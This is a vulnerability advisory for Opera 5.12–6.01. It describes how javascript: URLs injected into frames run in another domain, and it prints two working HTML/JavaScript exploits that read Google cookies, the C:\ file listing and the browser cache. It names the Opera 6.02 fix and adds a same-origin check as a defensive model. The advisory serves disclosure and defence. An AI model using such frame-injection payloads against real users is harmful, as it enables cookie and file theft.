COMMAND

    Opera web browser: javascript: protocol permits reading cookies/filesystem/cache

SYSTEMS AFFECTED

    At least Opera 6.01, 6.0, 5.12

PROBLEM

    In Andreas Sandblad [sandblad@acc.umu.se] advisory [#6] :

             _     _
           o' \,=./ `o
              (o o)
    ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

    Opera allows the location of a frame to be overwritten by a URL containing
    the javascript: protocol. The javascript code will then run in the same
    domain as the URL that was overwritten. Thus we can read cookies from other
    domains, the local file structure and private information from the cache
    (history of links visited).

    EXPLOIT I:
    ==========

    The following exploit has been tested to work on Opera 6.01, 6.0 (win).
    It will not work on 5.x because it requires the iframe feature.

    ------------------- CUT HERE -----------------------------------
    <iframe name=cookie src="http://www.google.com/" height=0 width=0></iframe>
    <iframe name=files src="file://c:/" height=0 width=0></iframe>
    <iframe name=cache src="opera:cache" height=0 width=0></iframe><br>
    <a href="javascript:readCookie()">Read google cookie</a><br>
    <a href="javascript:readFiles()">Read c:/ structure (win)</a><br>
    <a href="javascript:readCache()">Read links in cache</a><br>
    <script>
    // Each function overwrites a named frame's location with a javascript: URL;
    // the code then runs in the domain of the document that frame was showing.
    function readCookie(){
      cookie.location="javascript:alert(document.cookie)";
    }
    function readFiles(){
      t = 'javascript:s="";l=document.links;';
      t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
      files.location = t;
    }
    function readCache(){
      t = 'javascript:s="";l=document.links;';
      t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
      cache.location = t;
    }
    </script>
    ------------------- CUT HERE -----------------------------------

    EXPLOIT II:
    ===========

    For versions of Opera not supporting the iframe tag the exploit must be
    done using the frame tag instead. The following exploit has been tested
    on Opera 6.01, 6.0, 5.12 (win).

    ------------------- CUT HERE -----------------------------------
    <HTML>
    <FRAMESET ROWS="100%,0,0,0">
    <FRAME SRC="payload.html">
    <FRAME NAME="cache" src="opera:cache" noresize>
    <FRAME NAME="files" src="file:///c:/" noresize>
    <FRAME NAME="cookie" src="http://www.google.com/" noresize>
    </FRAMESET>
    </HTML>
    ------------------- CUT HERE -----------------------------------

    payload.html:

    ------------------- CUT HERE -----------------------------------
    <a href="javascript:alert(document.cookie)" target="cookie">Google cookie</a><br>
    <a href="javascript:alert(document.links.item(0))" target="cache">First item in cache</a><br>
    <a href="javascript:alert(document.links.item(1))" target="files">First file/directory in c:\ (win)</a>
    ------------------- CUT HERE -----------------------------------

SOLUTION

    Get Opera 6.02 : http://www.opera.com/
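The check that closes the hole described under PROBLEM is a same-origin test applied before a javascript: URL is allowed to run in a frame, as an added example that is not part of the advisory or of Opera's code. It models the browser's decision only; the origin strings, frame names and the treatment of file: and opera: documents as opaque origins are assumptions of the example.

```javascript
// Added example, not from the advisory: a minimal model of the same-origin
// check a browser must apply before letting a javascript: URL execute in a
// named frame. Origins are scheme://host[:port]; file: and opera: documents
// get an opaque origin that never matches anything (an assumption here that
// mirrors how modern browsers treat non-http(s) schemes).
function originOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):(?:\/\/([^/?#]*))?/i.exec(url);
  if (!m) throw new Error("unparseable URL: " + url);
  const scheme = m[1].toLowerCase();
  if (scheme !== "http" && scheme !== "https") return { opaque: true, id: url };
  return { opaque: false, id: scheme + "://" + m[2].toLowerCase() };
}

function sameOrigin(a, b) {
  return !a.opaque && !b.opaque && a.id === b.id;
}

// Frames constructed to mirror the advisory's exploit page.
const frames = {
  cookie: { origin: originOf("http://www.google.com/") },
  files:  { origin: originOf("file:///c:/") },
  cache:  { origin: originOf("opera:cache") },
};

// Decide whether a navigation requested by the document at `initiatorUrl`,
// targeting `frameName`, may proceed. A javascript: URL executes inside the
// frame's current document, so it is allowed only when the initiator is
// same-origin with that document. An ordinary URL replaces the document, so
// it is allowed and the frame's origin becomes that of the new document.
function navigate(initiatorUrl, frameName, targetUrl) {
  const frame = frames[frameName];
  if (!frame) return { allowed: false, reason: "no such frame" };
  if (/^javascript:/i.test(targetUrl)) {
    const ok = sameOrigin(originOf(initiatorUrl), frame.origin);
    return { allowed: ok, reason: ok ? "same-origin javascript: URL" : "cross-origin javascript: URL blocked" };
  }
  frame.origin = originOf(targetUrl);
  return { allowed: true, reason: "navigated" };
}
```

Under this rule the advisory's `cookie.location = "javascript:..."` from a third-party page is refused, while the same call after the frame has been navigated to the caller's own origin is permitted, since it can then only read the caller's own data.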